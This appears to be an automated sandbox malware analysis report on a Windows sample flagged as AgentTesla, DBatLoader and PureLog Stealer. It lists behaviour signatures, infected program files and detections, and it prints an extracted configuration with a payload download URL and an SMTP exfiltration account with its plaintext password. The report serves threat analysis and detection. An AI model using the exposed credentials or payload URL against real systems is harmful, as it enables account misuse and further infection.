Windows Analysis Report
C6dAUcOA6M.exe

Overview

General Information

Sample name: C6dAUcOA6M.exe
(renamed because the original name is a hash value)
Original sample name: 0161d30defee14b9bdac49068c63a344320c11330acdfc10952c025637684adb.exe
Analysis ID: 1562865
MD5: 53f0663219e6091cecd600c59389711f
SHA1: f1986a61c2cb0107444fbd3e8075a25e21fb26ca
SHA256: 0161d30defee14b9bdac49068c63a344320c11330acdfc10952c025637684adb
Tags: doganalecmdexeuser-JAMESWT_MHT

Detection

AgentTesla, DBatLoader, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates files in the system32 config directory
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops large PE files
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Spawns drivers
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

AV Detection

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C6dAUcOA6M.exe Malware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak2/233_Juqmtmyadyy"]}
Source: Native_neworigin.exe.7892.40.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "s82.gocheapweb.com\"", "Username": "info2@j-fores.com", "Password": "london@1759 "}
Source: deoci.biz Virustotal: Detection: 14% Perma Link
Source: nqwjmb.biz Virustotal: Detection: 13% Perma Link
Source: wllvnzb.biz Virustotal: Detection: 13% Perma Link
Source: dwrqljrr.biz Virustotal: Detection: 15% Perma Link
Source: C6dAUcOA6M.exe ReversingLabs: Detection: 63%
Source: C6dAUcOA6M.exe Virustotal: Detection: 62% Perma Link
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Joe Sandbox ML: detected
Source: C6dAUcOA6M.exe Joe Sandbox ML: detected
Source: C6dAUcOA6M.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49826 version: TLS 1.2

Spreading

Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7z.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Windows\System32\AppVClient.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\Public\Libraries\aymtmquJ.pif System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Windows\System32\alg.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02CF5908
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 7_2_00EF0207
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 7_2_00EF589A
